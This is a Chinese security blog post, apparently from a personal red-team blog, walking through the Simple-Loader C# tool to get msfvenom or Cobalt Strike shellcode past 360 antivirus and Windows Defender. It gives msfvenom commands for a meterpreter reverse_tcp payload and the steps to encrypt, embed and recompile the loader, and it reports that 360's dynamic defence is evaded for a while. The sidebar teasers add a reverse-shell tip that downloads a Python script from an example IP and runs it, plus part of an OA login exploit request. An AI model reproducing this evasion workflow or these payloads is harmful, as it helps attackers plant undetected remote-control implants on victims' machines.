使用Simple-Loader绕过杀软
BypassAV     过360     远控上线     绕过windows defender     Simple-Loader    

使用Simple-Loader绕过杀软

376 次访问
leader
Scroll Down

环境:

Language: C# .NET Framework 4.0 Visual Studio 2019 (community) Build Architecture: x64 Shell Code: MSFVenom windows/exec x32 或者 Cobal Strike x32

生成Payload

calc测试payload

msfvenom -a x86 -p windows/exec cmd=calc.exe -f csharp

或者

msf远控payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f csharp > payload.txt

再或者

CS生成C#版本Payload

编译Simple-Loader

打开Github下载下来的项目后,编译

编译Simple-Loader

运行Simple-Loader

Simple-Loader.exe <path_to_metasploit_payload_txt>

Snipaste_20191223_122622.png

可以看到,软件返回了一个密文结果。

复制该密文结果到Simple-Loader的源码中。

替换Shellcode加密后的内容

然后重新编译。生成新的Simple-Loader.exe

测试效果

将重新生成好的Simple-Loader.exe直接运行即可

360动态杀毒可以过

过360动态防御

但是,过一段时间,360上传分析后,就被杀了。这样的方式只能过一段时间。但是已经很不错了。

被杀

原理理解

其实看代码差不多就能理解,也是Bypass的基本操作,利用类似AES加密这样的操作,将Payload进行加密后,再进行解密,并且直接在内存中运行。

参考

Simple-Loader

bypass-windows-defender-with-a-simple-shell-loader

© 本文著作权归作者所有,转载前请务必署名

最新文章
Shiro反序列化无文件回显

今天突然看到一个项目发现很不错。https://github.com/j1anFen/ysoserial_echo支持:ApereoCAS4.1.X默认密钥Shirospring环境下回显Liferayprotal7.0以上本地复现环境Vulhub环境搭建git下来后,直接在ysoserial_ec
「Tips」命令执行无回显无法反弹shell的后续操作

我一般在遇到Java反序列化可以命令执行后,会选择用python的方式反弹shell。先wget下载wgethttp://123.123.123.123/shell.py-O/tmp/shell.py然后再执行python/tmp/shell.py这样一般不用去考虑符号带来的编码问题了。虽然要繁琐些
Tomcat幽灵猫漏洞实战

前言:    公司项目上遇到的一个传销站,是一个Thinkphp3.0的。尝试了payload进行注入后,发现只有一个盲注。于是就去找找有没有相同站点,拿个源码来审计审计。搜索到一个相同站点下存在8009端口的ajp协议和一个8080端口的tomcat站点,于是就想到了幽灵猫漏洞。发现使用Jspst
「漏洞复现」通达OA任意用户登陆

直接上POC热乎着的GET/general/login_code.phpHTTP/1.1Host:192.168.91.131Pragma:no-cacheCache-Control:no-cacheUpgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(
「漏洞复现」CVE-2020-2555-Oracle Coherence&WebLogic反序列化远程代码执行

「漏洞复现」CVE-2020-2555-OracleCoherence&WebLogic反序列化远程代码执行我的环境靶机:windows2008r2datacenterjavajdk8u202weblogic12.2.1.3.0ip:192.168.91.131攻击机:macOScatali
分类
工具 1593115068035
小技巧 1590506915066
漏洞复现 vulnhub
杂记 1578377560604
权限维持 1577677481988
Bypass bypass
ATT&CK attck
红蓝对抗 redteam
标签
无文件 无文件
回显 回显
Shiro反序列化 shiro反序列化
Shiro shiro
微信解密 1593115099474
微信聊天记录解密 1593115099470
命令执行 1590506843774
Tips tips
无回显 1590506843757
CNVD-2020-10487 cnvd-2020-10487
Tomcat幽灵猫 tomcat
CVE-2020-1938 cve-2020-1938
实战 1588140261114
通达OA oa
CVE-2020-2555 cve-2020-2555
漏洞复现 1587026226930
CVE-2020-2551 cve-2020-2551
Weblogic weblogic
2019 2019
总结 1578377564263
记录SSH密码 ssh
权限维持 1577677497553
Linux linux
红队 1577245982632
T1003 t1003
Credential Dumping credential-dumping
抓取密码 1577242318501
Mimikatz mimikatz
ProcDump procdump
Simple-Loader simple-loader
T1223 t1223
CHM chm
绕过windows defender windows-defender
att&ck attck
MSbuild msbuild
远控上线 1576224996894
过360 360
反弹shell shell
PowerShell powershell
BypassAV bypassav
PowerLine powerline